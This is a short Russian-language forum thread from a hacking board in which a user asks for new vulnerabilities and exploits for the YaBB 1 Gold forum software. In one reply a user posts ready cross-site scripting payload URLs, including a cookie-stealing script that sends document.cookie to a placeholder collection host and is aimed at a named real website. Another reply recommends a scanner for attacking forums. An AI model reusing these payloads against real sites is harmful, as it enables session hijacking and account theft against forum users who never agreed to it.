Форумы Уязвимости форума YaBB 1 Gold - Release и сплойты к нему

Discussion in 'Уязвимости CMS/форумов' started by asma2k, 3 Jan 2006.

  1. asma2k

    asma2k New Member

    Joined:
    18 Mar 2005
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

    А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

    Может,кто что новое подскажет?
     
  2. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Да, там можно межсайтовый скриптинг произвести, вот пример:
    Code:
    http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>
    Code:
    http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 
    num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 
    %2b(document.cookie)%3b</Script>
    
    P.S. прошу прощения за флуд.
     
  3. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Эт ты где такую урлу надыбал?) :)
     
  4. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    это всё пасивные)))жаль
     
  5. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.
     
  6. Ricky

    Ricky Banned

    Joined:
    4 Jan 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    http://forum.antichat.ru/thread11807.html

    Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.